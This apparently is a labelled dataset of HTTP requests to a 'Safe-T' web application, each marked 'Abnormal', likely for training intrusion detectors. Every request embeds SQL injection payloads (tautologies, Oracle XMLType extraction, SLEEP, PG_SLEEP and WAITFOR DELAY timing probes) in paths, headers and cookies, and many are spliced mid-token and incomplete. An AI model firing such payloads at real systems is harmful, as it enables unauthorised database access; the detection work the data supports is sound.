GET /Safe-T/Webskin/DefaultWebskin/Tools/%27 %29 %20 AND %20 %3D %28 SELECT %20 UPPER %28 XMLType %28 CHR %28 60 %29 %7C%7C CHR %28 58 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %20 FROM %20 DUAL %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 62 %29 %29 %29 %20 FROM %20 DUAL %29 %20 AND %20 %28 %27 %27 %3D %27bootstrap-3.1.1/js/bootstrap.min.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/'OR 'a'='a'default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /%27 %20 AND %20 %3D %28 SELECT %20 UPPER %28 XMLType %28 CHR %28 60 %29 %7C%7C CHR %28 58 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %20 FROM %20 DUAL %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 62 %29 %29 %29 %20 FROM %20 DUAL %29 %20 AND %20 %27 %27 %3D %27Safe-T/Webskin/DefaultWebskin/Tools/bootstrap-dialog/js/bootstrap-dialog.min.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/jstree-3.0.0/index.html?id=12'OR 'a'='a' SELECT * FROM DATA HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=%25 %27 %20 AND %20 %3D %28 SELECT %20 UPPER %28 XMLType %28 CHR %28 60 %29 %7C%7C CHR %28 58 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %20 FROM %20 DUAL %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 62 %29 %29 %29 %20 FROM %20 DUAL %29 %20 AND %20 %27 %25 %27 %3D %27; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/list.%20 AND %20 %3D %28 SELECT %20 UPPER %28 XMLType %28 CHR %28 60 %29 %7C%7C CHR %28 58 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %20 FROM %20 DUAL %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 62 %29 %29 %29 %20 FROM %20 DUAL %29 -- %20js/dist/list.min.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/selectize%28 SELECT %20 CONCAT %28 %2C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %29 %2C %29 %29.js-0.11.2/js/standalone/selectize.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/bootstrap-touchspin/bootstrap.touchspin.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101%28 SELECT %20 %28 'OR 'a'='a'CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %29 %7C%7C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 %20 ELSE %20 0 %20 END %29 %29 %3A%3Atext%7C%7C %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %29 %29Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /%28 SELECT %20 CHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2B %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 CHAR %28 49 %29 %20 ELSE %20 CHAR %28 48 %29 %20 END %29 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %2BCHAR %28 %29 %29 HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/jQuery-File-Upload-9.5.7/js/jquery.iframe-transport.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept:%28 SELECT %20 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 %20 ELSE %20 0 %20 END %29 %20 FROM %20 DUAL %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %20 FROM %20 DUAL %29 */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/jQuery-File-Upload-9.5.7/js/jquery.fileupload.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .SELECT %20 %27 %27 %7C%7C %28 SELECT %20 %28 CASE %20 WHEN %20 %28 %3D %29 %20 THEN %20 1 'OR 'a'='a'%20 ELSE %20 0 %20 END %29 %29 %7C%7C %27 %27,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/jQuery-File-Upload-9.5.7/js/tmpl.min.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Extra: %29 %3B %20 SELECT %20 SLEEP %28 5 %29 -- %20Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/jQuery-File-Upload-9.5.7/js/jquery.fileupload-process.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101%3B %20 SELECT %20 SLEEP %28 5 %29 -- %20 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/jQuery-File-Upload-9.5.7/js/jquery.fileupload-validate.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/%27 %29 %3B %20 SELECT %20 SLEEP %28 5 %29 -- %20 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/JS/mainUploadWidget.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: %27 %3B %20 SELECT %20 S'OR 'a'='a'LEEP %28 5 %29 -- %20.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/%25 %27 %3B %20 SELECT %20 SLEEP %28 5 %29 -- %20/Tools/jQuery-File-Upload-9.5.7/js/jquery.fileupload-ui.js HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/bootstrap-3.1.1/css/bootstrap.min.css HTTP/1.1Host: %3B %20 SELECT %20 SLEEP %28 5 %29 -- %20User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/css*/*;q=0.1Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/Webskin/DefaultWebskin/Style/Main.cssCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/bootstrap-3.1.1/css/Custom.css HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: %29 %3B %20 SELECT %20 PG_SLEEP %28 5 %29 --/css*/*;q=0.1Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/Webskin/DefaultWebskin/Style/Main.cssCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/selectize.js-0.9.1/css/selectize.bootstrap3.css HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 %3B %20 SELECT %20 PG_SLEEP %28 5 %29 --/42.0Accept: text/css*/*;q=0.1Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.'OR 'a'='a'4.109/Safe-T/Webskin/DefaultWebskin/Style/Main.cssCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/bootstrap-dialog/css/bootstrap-dialog.min.css HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/css*/*;q=0.1Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/Webskin/DefaultWebskin/Style/Main.cssCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=%27 %29 %3B %20 SELECT %20 PG_SLEEP %28 5 %29 --; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/jstree-3.0.0/themes/default/custom.css HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/css*/*;q=0.1Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/%27 %3B %20 SELECT %20 PG_SLEEP %28 5 %29 ---T/Webskin/DefaultWebskin/Style/Main.cssCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/%25 %27 %3B %20 SELECT %20 PG_SLEEP %28 5 %29 ---awesome-4.2.0/css/font-awesome.min.css HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/css*/*;q=0.1Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/Webskin/DefaultWebskin/Style/Main.cssCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/%3B %20 SELECT %20 PG_SLEEP %28 5 %29 --/Tools/jQuery-File-Upload-9.5.7/css/style.css HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/css*/*;q=0.1Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/Webskin/DefaultWebskin/Style/Main.cssCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/jQuery-File-Upload-9.5.7/css/jquery.fileupload.css HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.%29 %3B %20 WAITFOR %20 DELAY %20 %27 0%3A0%3A5 %27 --: text/css*/*;q=0.1Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/Webskin/DefaultWebskin/Style/Main.cssCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/jQuery-File-Upload-9.5.7/css/jquery.fileupload-ui.css HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/css%3B %20 WAITFOR %20 DELAY %20 %27 0%3A0%3A5 %27 --/*;q=0.1Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/Webskin/DefaultWebskin/Style/Main.cssCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Images/LogoFFF.png HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: image/pngimage/*;q=0.8*/*;q=0.5Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: %27 %29 %3B %20 WAITFOR %20 DELAY %20 %27 0%3A0%3A5 %27 --; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/header.html HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/html%27 %3B %20 WAITFOR %20 DELAY %20 %27 0%3A0%3A5 %27 --/xhtml+xmlapplication/xml;q=0.9*/*;q=0.8Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/%25 %27 %3B %20 WAITFOR %20 DELAY %20 %27 0%3A0%3A5 %27 --.html HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/htmlapplication/xhtml+xmlapplication/xml;q=0.9*/*;q=0.8Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Style/Footer.css HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/css*/*;q=0.1Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/Webskin/DefaultWebskin/footer.htmlCookie: %3B %20 WAITFOR %20 DELAY %20 %27 0%3A0%3A5 %27 --; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
